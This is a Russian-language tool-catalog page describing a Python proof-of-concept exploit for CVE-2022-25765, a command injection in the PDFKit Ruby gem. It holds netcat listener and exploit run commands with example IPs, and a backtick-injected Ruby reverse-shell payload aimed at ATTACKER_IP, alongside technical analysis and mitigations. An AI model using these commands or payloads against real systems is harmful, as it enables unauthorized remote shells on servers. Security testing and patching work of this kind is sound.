Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-25765 — Python PoC эксплойт для CVE-2022-25765, критическая инъекция команд в PDFKit. Генерирует обратную оболочку через несанитизированные параметры URL, передаваемые в wkhtmltopdf. Включает инструкции по использованию и технический анализ уязвимости. | Kitploit
Инструменты/GitHubGitHub/lowercasenumbers/cve-2022-25765
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHublowercasenumbers/cve-2022-25765

CVE-2022-25765

Python PoC эксплойт для CVE-2022-25765, критическая инъекция команд в PDFKit. Генерирует обратную оболочку через несанитизированные параметры URL, передаваемые в wkhtmltopdf. Включает инструкции по использованию и технический анализ уязвимости.

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-25765 Эксплойт

Небольшой PoC-эксплойт для CVE-2022-25765, PDFkit-CMD-Injection

Использование

  1. Запустите netcat-слушатель на вашей атакующей машине:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Запустите эксплойт:

    root@kitploit:~
    python cve-2022-25765.py -t http://TARGET_IP:PORT -l YOUR_IP -p YOUR_PORT
    

Пример:

root@kitploit:~
python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 4444

Параметры:

  • -t, --target: Целевой URL с уязвимым PDFKit
  • -l, --lhost: Ваш IP-адрес для подключения обратной оболочки
  • -p, --lport: Ваш порт для подключения обратной оболочки (должен совпадать с портом вашего netcat-слушателя)

Информация об уязвимости

CVE ID: CVE-2022-25765 CVSS v3.1 Score: 9.8 (Критический) EPSS Score: 71.381% (99-й процентиль) CWE: CWE-77 - Improper Neutralization of Special Elements used in a Command

Затронутые версии

  • Уязвимые: PDFKit 0.0.0 - 0.8.6
  • Исправленные: PDFKit 0.8.7.2+

Описание

PDFKit — это Ruby-гем, который преобразует HTML в PDF с помощью утилиты командной строки wkhtmltopdf. Уязвимость заключается в том, как PDFKit обрабатывает параметры URL перед передачей их системным командам оболочки для генерации PDF.

Технические подробности

Уязвимость находится в lib/pdfkit/source.rb, где неправильно реализована очистка URL:

root@kitploit:~
def shell_safe_url
  url_needs_escaping? ? URI::DEFAULT_PARSER.escape(@source) : @source
end

Проблема:

  1. PDFKit использует ошибочную логику для определения необходимости экранирования URL
  2. Метасимволы оболочки (обратные кавычки, точки с запятой, пайпы и т.д.) могут обойти эту проверку
  3. Неочищенные URL напрямую передаются командам оболочки, вызывающим wkhtmltopdf
  4. Злоумышленники могут внедрить произвольные команды, которые выполняются на сервере

Вектор атаки:

  • Сложность: Низкая
  • Необходимые привилегии: Нет
  • Взаимодействие с пользователем: Нет
  • Сетевой доступ: Требуется

Как работает этот эксплойт

Данный PoC эксплуатирует уязвимость следующим образом:

  1. Внедрение вредоносного URL, содержащего подстановку команд через обратные кавычки
  2. Полезная нагрузка: http://ATTACKER_IP:PORT/?name=%20` ruby -rsocket...`'
  3. PDFKit не очищает обратные кавычки в параметре URL
  4. Когда wkhtmltopdf обрабатывает URL, оболочка выполняет Ruby-обратную оболочку
  5. Целевая система подключается обратно к слушателю атакующего

Воздействие

  • Конфиденциальность: Высокий — полный доступ к системе
  • Целостность: Высокий — возможность изменять любые файлы
  • Доступность: Высокий — потенциальное нарушение работы системы

Предварительные условия для успешной эксплуатации

В целевой системе:

  • Уязвимая версия PDFKit (< 0.8.7.2)
  • Установленный Ruby (требуется для полезной нагрузки обратной оболочки)
  • Приложение принимает управляемые пользователем URL, передаваемые в PDFKit
  • Отсутствие фильтрации исходящего трафика, блокирующей исходящие соединения

Устранение

  1. Обновление PDFKit до версии 0.8.7.2 или новее
  2. Валидация ввода: Реализовать строгий белый список для URL-вводов
  3. Изоляция: Запускать процессы PDFKit в изолированных контейнерах с минимальными привилегиями
  4. Сегментация сети: Ограничить исходящие соединения от сервисов генерации PDF
  5. Правила WAF: Развернуть правила для обнаружения метасимволов оболочки в параметрах URL

Ссылки

  • NVD - CVE-2022-25765
  • GitHub Advisory GHSA-rhwx-hjx2-x4qr
  • PDFKit Issue #507
  • RubySec Advisory
Скачать инструмент